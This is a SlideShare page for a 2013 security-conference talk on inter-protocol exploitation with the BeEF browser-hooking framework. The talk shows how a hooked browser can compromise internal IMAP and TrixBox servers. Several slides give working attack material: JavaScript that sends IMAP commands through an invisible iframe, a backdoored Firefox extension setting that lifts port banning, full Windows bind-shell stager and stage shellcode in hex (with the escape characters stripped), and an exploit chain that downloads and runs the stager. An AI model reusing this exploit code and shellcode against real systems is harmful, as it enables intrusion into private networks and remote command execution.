Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF

6,399 views
6,235 views

Published on

Inter-protocol Exploitation removes browser-based attacks from being
dependent upon browser vulnerabilities.
It increases the number of potential exploits to include many service
vulnerabilities throughout the internal corporate network.
This includes whatever service can be contacted via a browser request.
Multiple protocols like IMAP, SMTP, POP, SIP, IRC and others are "tolerant"
to errors, and they don't reset the connection with the client if they
receive
data that is not compliant with the protocol grammar.
This leads to the possibility of interacting with such protocols with
HTTP requests,
even without the need of a SOP bypass.
During the talk, we will see a demonstration on how to compromise an
IMAP server that sits in the victim's internal network through its
browser hooked
in BeEF.
This will include disabling the browser's PortBanning, identifying the
victim's internal network IP and the live hosts in the subnet,
followed by a port scan and finally sending the custom BeEF Bind
shellcode after the IMAP service
has been localized.

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
6,399
On SlideShare
0
From Embeds
0
Number of Embeds
41
Actions
Shares
0
Downloads
70
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF

  1. 1. Rooting your internals: custom shellcode, BeEF and Inter-protocol exploitation antisnatchor HackPra AllStars 2013
  2. 2. About myself •Co-author of Browser Hacker’s Handbook (now on pre-order from Amazon.co.uk, available February/March 2014) •BeEF lead core developer •Application Security researcher •Ruby, Javascript, OpenBSD and BlackMetal fan
  3. 3. • Current situation and traditional browser attack vectors • BeEF and Inter-Protocol Exploitation • The BeEF Bind shellcode • How the shellcode delivery and exploitation works • Demo fun, current limitations and... About The Talk
  4. 4. • Aimed at compromise the browser itself, or plugins • Sandboxes and exploit mitigation techniques make our life difficult • 0-day browser exploits are extremely expensive Current situation traditional browser attack vectors
  5. 5. • Is the victims web browser patched? • Do you have $100k to spend on a single 0-day (weaponized) browser exploit? • How many times can you re-use your 0day for targeted attacks before it will be detected, reversed and patched? • How many useful browser exploits are available? Current situation Browser vulnerability exploitation
  6. 6. • Is the plugin patched or vulnerable? • How reliable are the plugin exploits? • most latest browsers don’t leak anymore exact plugin info (except for Firefox, thanks Mozilla) • Java-based exploits (also for ROP chains) require user- intervention on many current browsers (i.e. Chrome) • From Java 7 even unsigned applets require explicit user intervention to run! (see Immunity bypass - now patched) Current situation Browser plugin exploitation
  7. 7. • Mis-understood, not patched, found in 90% of application pentests • Full DOM manipulation • SOP restrictions, additional HTTP headers restrictions, CSP • In fact, alert(1) is the mostly used attack vector • Oh, wait sorry, also stealing cookies... Current situation Cross Site Scripting
  8. 8. Current situation traditional browser attack vectors Internal server vulnerabilities are sitting there bored and lonely...
  9. 9. • Imagine a framework like Metasploit, but for browser-based attacks • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security context abuse. • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context. The scary BeEF changing browser attack vectors
  10. 10. • Through a simple XSS or Phishing page, with BeEF we can hook victim browsers and control them entirely with Javascript • No more alert(1) crap • AntiVirus? Fuck that, it’s not going to detect BeEF • Features like ManInTheBrowser,Tunneling Proxy and remote exploits are all implemented in (relatively) simple Javascript The scary BeEF changing browser attack vectors
  11. 11. Idea flow read top to bottom Michele: Awesome, let me do some research and lets port it to BeEF Wade: My IPEC research was cool, we should research further Ty: I developed a new staging shellcode that acts like a WebServer
  12. 12. • Back in 2006/2007 Wade Alcorn researched what he called Inter-Protocol exploitation • Exploit ‘tolerant’ protocol implementations, which do not drop the client connection after N errors • A properly encoded POST request can be sent to the target: • HTTP request headers are parsed as BAD COMMANDS • HTTP request body is parsed asVALID COMMANDS • HTTP request body also contains shellcode. FUN STARTS Revitalizing IPEC Inter-Protocol Exploitation
  13. 13. Revitalizing IPEC Inter-Protocol Exploitation: IMAP var server = '172.16.37.151'; var port = '143'; var commands = 'a01 login root passwordna002 logout'; var target = "http://" + server + ":" + port + "/abc.html"; var iframe = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('name', 'data'); form.setAttribute('action', target); form.setAttribute('method', 'post'); form.setAttribute('enctype', 'text/plain'); var input = document.createElement('input'); input.setAttribute('id', 'data1') input.setAttribute('name', 'data1') input.setAttribute('type', 'hidden'); input.setAttribute('value', commands); form.appendChild(input); iframe.contentWindow.document.body.appendChild(form); form.submit();
  14. 14. • Limitations: • SOP and cross-domain restrictions • Port Banning (damn you!) • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? NOPE :D Revitalizing IPEC Inter-Protocol Exploitation: limitations
  15. 15. • Limitations: • SOP and cross-domain restrictions •PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 1 On all browsers (except Opera) we can ‘blindly’ send data cross-origin with XHR, without the need to read HTTP responses. This is (usually) enough to pwn services.
  16. 16. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 http://xyz.com:143/ FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED Connection to various known port (22/25/143/993/995/etc..) denied. On Firefox, an extension can override config options:
  17. 17. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Trick the victim to install a backdoor’ed Firefox extension.The pref.js file of the extension contains: // PortBanning override pref("network.security.ports.banned.override", "20,21,22,25,110,143");
  18. 18. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Only about 60 TCP ports are prohibited by Port Banning -> 65465 are allowed :D 220 - imap3 (only IE blocks it :-) 6667 - IRC (Firefox/IE only) 9100 - jetdirect 10000 - ExtraNET you name it: HP OpenView, Java RMI stuff, etc..
  19. 19. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 Lots of HTTP headers are automatically created by the browser (around 400 bytes). Most of them cannot be overridden, and cross-domain they are even bigger. We can override some of them:
  20. 20. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 We can save other 100 bytes overriding the UserAgent through the Firefox extension: pref("general.useragent.override", "Firefox/15.0.1");
  21. 21. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 4 The original IPEC paper was using: Content-Type: multipart/form-data; Our approach uses, to save space: Content-Type: text/plain;
  22. 22. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 5 Not anymore, thanks to the BeEF Bind shellcode. You have a bind shellcode which can be totally controlled through an hooked browser sitting in the same victim internal network.
  23. 23. High Level Architecture from FF extension to command execution
  24. 24. High Level Architecture from FF extension to command execution
  25. 25. High Level Architecture from FF extension to command execution
  26. 26. High Level Architecture from FF extension to command execution
  27. 27. High Level Architecture from FF extension to command execution
  28. 28. 28 BeEF Bind shellcode how it works • Ty Miller created a new staging Windows shellcode, which we called BeEF Bind • He was bored of reverse shells :D • stager -> 299 bytes (326 after bad-char encoding) • stage -> 792 bytes • The stager sets up a bind port on 4444/TCP to accept an HTTP POST request containing the raw stage in a parameter called ‘cmd’. var stager = "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" + "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" + "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" + "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" + "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" + "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" + "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" + "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" + "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" + "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" + "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" + "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" + "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" + "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" + "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" + "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" + "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" + "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" + "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" + "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" + "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" + "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" + "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" + "x37x96x26x84";
  29. 29. 29 BeEF Bind shellcode how it works • The stage sets up a bind port on 4444/TCP to accept HTTP POST requests from the web browser. • Set of pipes to redirect the cmd.exe input and output. This allows to jump in the middle of the HTTP request and the cmd.exe process to implement the web server style functionality. • The command result output is returned with the Access-Control-Allow-Origin: * header. After the stage is deployed, SOP is not a problem anymore. var stage_allow_origin = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28" "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" + "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" + "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" + "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" + "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" + "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" + "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" + "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" + "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" + "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" + "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" + "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" + "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" + "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" + "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" + "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" + "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" + "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" + "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" + "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" + "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" + "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" + "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" + "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" + "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" + "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" + "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" + "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" + "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" + "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" + "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" + "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" + "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" + "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" + "xfexffxff";
  30. 30. • Shellcode is binary data • Stager and Stage are delivered with XMLHttpRequest.sendAsBinary • For Webkit browsers that don’t support sendAsBinary, prototype overriding on XHR object. BeEF Bind shellcode delivery and usage from within BeEF if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } this.send(ui8Data); };} Stager - Stage
  31. 31. • We cannot know in advance the exact size of HTTP headers. • A dummy cross-domain XHR request is sent back to BeEF, exact size of headers is calculated, and exploit junk is adjusted accordingly. • Like in all exploits, 1 byte error is enough to have a not-working exploit. • With this approach, errors are minimized and the exploit becomes reliable. BeEF Bind shellcode delivery and usage from within BeEF
  32. 32. • Typical SEH exploit with EggHunter, non-IPEC: • commands + junk + shellcode + next_seh + seh + egg_hunter • Typical SEH exploit with EggHunter, IPEC: • HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter BeEF Bind shellcode delivery and usage from within BeEF
  33. 33. BeEF Bind shellcode delivery and usage from within BeEF Immunity DBG view: IMAP process memory when sending the stager
  34. 34. BeEF Bind shellcode delivery and usage from within BeEF Wireshark view: exploit with shellcode stager Wireshark view: command delivery and results
  35. 35. 35 BeEF Bind shellcode delivery and usage from within BeEF Ultimate fun. BeEF IPEC shell (JS) exec command get results set target
  36. 36. Demo fun from phishing to internal IMAP server compromise
  37. 37. • Bart Leppens ported the Win32 BeEF Bind shellcode to Linux • Great to be used as shellcode for normal Linux exploits • Great to be used as a binary with any Remote Command Execution • TrixBox <= 2.6.1 pre-auth RCE example with BeEF Bind Linux • Exploit here (through normal sockets, not from the browsers): http://www.exploit-db.com/exploits/6026/ BeEF Bind shellcode delivery and usage from within BeEF
  38. 38. • Identify TrixBox in the hooked browser internal network (BeEF “internal_network_fingerprinting”module) • Get the current PHPSESSID, needed to trigger the malicious PHP code that will be leaving in PHP’s $_SESSION object • The attack vector downloads the BeEF Bind shellcode stager and executes it • Last step is send to the stager bind port the Stage contents • You’re now ready to send commands and get results from the hooked browser BeEF Bind shellcode delivery and usage from within BeEF
  39. 39. Demo fun TrixBox RCE exploitation from the browser
  40. 40. • Wade and the other BeEF guys • Ty and Bart for their awesome shellcodes • Mario and the other awesome speakers • If you want to support BeEF, buy our book. 50% of royalties will be used exclusively for the BeEF project (no joke)! • http://www.amazon.co.uk/Browser-Hackers-Handbook- Wade-Alcorn/dp/1118662091/ Thanks
  41. 41. Questions?

×